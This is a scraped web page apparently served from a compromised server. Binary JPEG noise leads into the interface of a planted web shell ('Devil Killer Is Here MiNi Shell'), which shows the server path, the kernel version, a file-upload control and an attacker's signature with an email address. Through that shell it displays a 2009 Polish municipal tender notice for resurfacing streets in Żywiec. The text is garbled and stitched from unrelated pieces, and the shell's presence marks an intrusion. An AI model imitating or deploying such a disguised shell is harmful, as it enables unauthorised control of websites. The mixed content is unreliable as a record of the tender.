JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090925/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090925/333840-N-2009.html

<p class="kh_header"><b>Żywiec: Remont nawierzchni jezdni ulic: Nad Dworem, Stokowa i Turystyczna w Żywcu</b><br>
<b>Numer ogłoszenia: 333840 - 2009; data zamieszczenia: 25.09.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Urząd Miejski Żywiec , ul. Rynek 2, 34-300 Żywiec, woj. śląskie, tel. 033 4754200, faks 033 4754202.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.zywiec.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Remont nawierzchni jezdni ulic: Nad Dworem, Stokowa i Turystyczna w Żywcu.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> . Przedmiotem  zamówienia są roboty budowlane związane z realizacją zadania pn.: Remont nawierzchni jezdni    ulic: Nad Dworem, Stokowa i Turystyczna w Żywcu. Zakres przewidywanych prac obejmuje remont ww. ulic - po istniejącym śladzie, a w szczególności:
1.1.	ulica Nad Dworem, remont nawierzchni jezdni obejmuje dwa odcinki, tj. odcinek od km 0+000 - 0+322 (od ul. Moszczenickiej do początku nawierzchni brukowej) i od km 0+462 - 1+242 (od końca nawierzchni brukowej do ul. Koczurowskiej). Szerokość jezdni 3,0m :
- skropienie nawierzchni asfaltem
- warstwa wiążąca 	- 	4cm
- warstwa ścieralna 	- 	4cm
- regulacja pionowa urządzeń podziemnych
- wyrównanie poboczy tłuczniem
1.2.	ulica Stokowa, długość remontowanego odcinka 165,0mb (od ul. Sporyskiej do końca zabudowy). Szerokość jezdni - 3,0m. 
- warstwa profilowa z tłucznia grubości 10cm
- skropienie nawierzchni asfaltem
- warstwa wiążąca 	- 	4cm
- warstwa ścieralna 	- 	4cm
- regulacja pionowa urządzeń podziemnych
- wyrównanie poboczy tłuczniem
1.3.	ulica Turystyczna, długość odcinka do remontu - 133,0mb (od ul. Matejki do kładki dla pieszych). Szerokość jezdni - 3,0m.
- warstwa profilowa z tłucznia grubości 5cm
- skropienie nawierzchni asfaltem
- warstwa wiążąca	- 	4cm
- warstwa ścieralna	-	4cm
- regulacja pionowa urządzeń podziemnych
- wyrównanie poboczy tłuczniem
 2. Szczegółowo  przedmiot  zamówienia  na roboty budowlane opisuje dokumentacja projektowa wraz z wymaganiami dotyczącymi wykonania i odbioru robót określonymi specyfikacją techniczną (załączniki nr 8), które stanowią jej integralną część.                                                                                                           
3.  Zaleca się przeprowadzenie wizji lokalnej w terenie oraz  zapoznanie się z dokumentacją, specyfikacjami  
     technicznymi  wykonania   i odbioru  robót budowlanych co warunkuje rzetelne przygotowanie się Wykonawcy do   
     przetargu.                                                                                                                                                                                4.  Do wykonawcy przedmiotu zamówienia należą również następujące obowiązki: 
- opracowanie   projektu   organizacji i   zabezpieczenia   ruchu  na czas budowy łącznie z uzyskaniem wymaganych prawem uzgodnień i zatwierdzeń. Zamawiający wymaga, aby roboty realizować w sposób zapewniający dojście i dojazd do posesji,   
- koszty związane  z wykonaniem oznakowania  wynikającym z projektu organizacji  ruchu   na   czas   budowy i   jego   właściwym   utrzymaniem   w trakcie   realizacji  zamówienia. Wykonawca zapewni prawidłowe utrzymanie i naprawę dróg dojazdowych oraz uzyska zezwolenia właścicieli dróg na przejazd i zajęcie pasa drogowego zgodnie z obowiązującymi przepisami. Koszt ewentualnych szkód wyrządzonych na osobach i rzeczach w związku z realizacją zamówienia obciążać będzie wyłącznie wykonawcę robót.
- sporządzenie Planu Bezpieczeństwa i Ochrony Zdrowia (BIOZ), o ile zachodzą przesłanki określone w art. 21a ust. 1a  ustawy z dnia 7 lipca 1994 r. Prawa budowlane (Dz. U. z 2006 r. Nr 156, poz. 1118 z późn. zm.)
- koszty wykonania   wytyczenia   geodezyjnego   realizowanego   zadania, bieżącej obsługi geodezyjnej budowy wraz z udokumentowaniem zakresów poszczególnych robót i etapów odbiorowych, a następnie opracowania geodezyjnej inwentaryzacji powykonawczej. Roboty geodezyjne muszą być wykonywane przez uprawnionego geodetę,
- Wykonawca zapewni nadzór administratorów sieci i urządzeń występujących w obrębie prowadzonych robót.
- wykonanie robót przygotowawczych i porządkowych, 
- doprowadzenie terenu budowy do stanu poprzedniego..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 45.23.32.20-7.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 10.11.2009.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Zamawiający żąda wniesienia wadium w wysokości 7000 zł (siedem tysięcy złotych)<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> O udzielenie zamówienia ubiegać się mogą Wykonawcy, którzy: 
1) spełniają   warunki   zawarte   w   art. 22  ust. 1 i nie zachodzą okoliczności wskazane w art. 24 ust.1 i 2 Prawa
    zamówień publicznych,
2) spełnią następujące wymogi szczegółowe:
     2.1. Potencjał kadrowy
            a) Wykonawca musi mieć do dyspozycji odpowiednio wykwalifikowany personel, a w szczególności  
   dysponować minimum po 1 osobie posiadającej wymagane uprawnienia budowlane w odpowiedniej dla
   wykonania zamówienia specjalności.
             b) Kierownik budowy wymagany z uprawnieniami do kierowania robotami drogowymi (dopuszcza się łączenie   
                  funkcji kierownika budowy z kierownikiem robót drogowych).
    
 2.2. Doświadczenie
w okresie   ostatnich pięciu lat przed dniem   wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres  
 prowadzenia  działalności  jest   krótszy - w tym okresie, wykonali co  najmniej jedno zadanie odpowiadające 
 rodzajem i   wartością   robotom  budowlanym  stanowiącym przedmiot zamówienia.
2.3. Potencjał ekonomiczny i finansowy
a) są ubezpieczeni od odpowiedzialności cywilnej w zakresie prowadzonej działalności na kwotę co najmniej  
     100 000 zł.
b) posiadają środki finansowe  lub zdolność kredytową nie mniejszą  niż 3/4 wartości oferowanej ceny brutto za 
     realizację zadania.
W przypadku , gdy ofertę składają Wykonawcy wspólnie ubiegający się o udzielenie zamówienia za spełnienie warunków ,o których mowa w art. 22 ust. 1 pkt.2 i 3 ustawy Prawo zamówień publicznych brany pod uwagę jest ich łączny potencjał kadrowy, techniczny, ekonomiczny i finansowy..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 1.	Wypełniony formularz ofertowy (załącznik nr 1) stanowiący kartę tytułową oferty, dostarczony Wykonawcom wraz ze Specyfikacją Istotnych Warunków Zamówienia, zawierający m.in.: oświadczenie o terminie związania ofertą, przyjęciu warunków przetargu zawartych w Specyfikacji Istotnych Warunków Zamówienia wraz z jej załącznikami bez zastrzeżeń, okresie rękojmi, terminie płatności określonym w dniach - wymagany termin płatności wynosi 30 dni.
2.	Oświadczenie, że  Wykonawca  uprawniony  jest do  ubiegania się o zamówienia publiczne, zgodnie z  art. 22 ust. 1  
        Prawa zamówień publicznych (załącznik nr 2).
3.	Wykaz osób uprawnionych do podpisywania dokumentów przetargowych i podejmowania zobowiązań w imieniu 
 Wykonawcy, oraz pełnomocnictwa udzielane osobom podpisującym dokumenty ofertowe, o ile prawo do reprezentowania Wykonawcy w powyższym zakresie nie wynika wprost z dokumentu rejestrowego.
4.	Aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.
5.	Aktualne zaświadczenie właściwego naczelnika urzędu skarbowego oraz właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające odpowiednio, że wykonawca nie zalega z opłacaniem podatków, opłat oraz składek na ubezpieczenie zdrowotne i społeczne, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawionych nie wcześniej niż 3 miesiące przed upływem składania ofert.
6.	Wykonawcy wspólnie ubiegający się o udzielenie zamówienia publicznego zobowiązani są do złożenia wraz z ofertą pełnomocnictwa do reprezentowania ich w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego. Wymagane oświadczenie i dokumenty wskazane w pkt.2, 4 i 5   niniejszego rozdziału powinny być złożone przez każdy podmiot.
7.	Wykaz wykonanych w okresie ostatnich pięciu lat robót budowlanych, a jeżeli okres działalności jest krótszy - w tym okresie, odpowiadających swoim rodzajem i wartością robotom budowlanym stanowiącym przedmiot zamówienia, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców (załącznik nr 5)  oraz załączeniem dokumentów potwierdzających, że roboty te zostały wykonane należycie. Informacja musi potwierdzać spełnienie warunku, o którym mowa w rozdz. III. pkt 2, ppkt 2.2. niniejszej SIWZ
8.	Wykaz niezbędnych do wykonania zamówienia narzędzi i urządzeń (załącznik nr 4), którymi dysponuje lub będzie dysponował Wykonawca - adekwatnych do charakteru zamówienia, a określonych w specyfikacjach technicznych wykonania i odbioru robót budowlanych.
9.	Pisemne zobowiązania podmiotów trzecich do udostępnienia potencjału technicznego, jeżeli w wykazie, o którym mowa w pkt.8. Wykonawca przedstawił narzędzia i urządzenia, którymi będzie dysponował przy wykonywaniu zamówienia.
10.	Wykaz osób, którymi dysponuje lub będzie dysponował Wykonawca i które będą uczestniczyć w wykonywaniu zamówienia, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia (załącznik nr 3) niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności. Informacja musi potwierdzać spełnienie warunku, o którym mowa w rozdz. III. pkt 2, ppkt 2.1. niniejszej SIWZ 
11.	Pisemne zobowiązania podmiotów trzecich do udostępnienia osób, jeżeli w wykazie, o którym mowa w pkt.10. Wykonawca przedstawił osoby, którymi będzie dysponował przy wykonywaniu zamówienia.
12.	Dokumenty stwierdzające, że osoby (objęcie kierownictwa budowy i branżowych robót budowlanych) które będą wykonywać zamówienie posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień (przez uprawnienia rozumie się uprawnienia budowlane w odpowiedniej specjalności do sprawowania samodzielnych funkcji technicznych w budownictwie, o których mowa w ustawie Prawo budowlane oraz - zgodnie z odrębnymi przepisami wpisani są na listę członków właściwej izby samorządu zawodowego, co potwierdza zaświadczenie wydane przez tę izbę, z określonym w nim terminem ważności.
13.	Informacja z banku lub spółdzielczej kasy oszczędnościowo-kredytowej, w którym wykonawca posiada podstawowy rachunek, potwierdzającej wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawionej nie wcześniej niż 3 miesiące przed upływem terminu składania ofert  i wysokości nie mniejszej niż 3/4 wartości oferowanej ceny brutto - warunek określony w rozdz. III. pkt 2 ppkt 2.3. b) niniejszej SIWZ
14.	Aktualna polisa lub inny dokument ubezpieczenia potwierdzający, że wykonawca jest ubezpieczony od   odpowiedzialności    cywilnej   w   zakresie   prowadzonej   działalności   na   kwotę co najmniej 100  000 zł  - warunek określony w rozdz. III. pkt 2 ppkt 2.3. a) niniejszej SIWZ
15.	Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej stosuje się odpowiednio do przepisów określonych w § 2 Rozporządzenia Prezesa Rady Ministrów z dnia 19 maja 2006 r. w sprawie rodzajów dokumentów, jakich może żądać zamawiający od wykonawcy oraz form, w jakich te dokumenty mogą być składane (Dz. U. Nr 87, poz. 605). 
16.	Kosztorysy ofertowe sporządzone na bazie przedmiaru robót i Szczegółowej Specyfikacji Technicznej wykonania i odbioru robót budowlanych oraz projektów budowlano-wykonawczych.
17.	Dowód wniesienia wadium..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.zywiec.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski w Żywcu, 34-300 Żywiec, Rynek 2 - Wydział Inżynierii Miejskiej, Ochrony Środowiska i Rozwoju Urbanistycznego - Referat Dróg - pokój 101.Zał. nr 1 - 7 wersja papierowa, nr 8-9 CD.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 15.10.2009 godzina 08:30, miejsce: Urząd Miejski w Żywcu, 34-300 Żywiec, Rynek 2 - biuro podawcze, parter.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com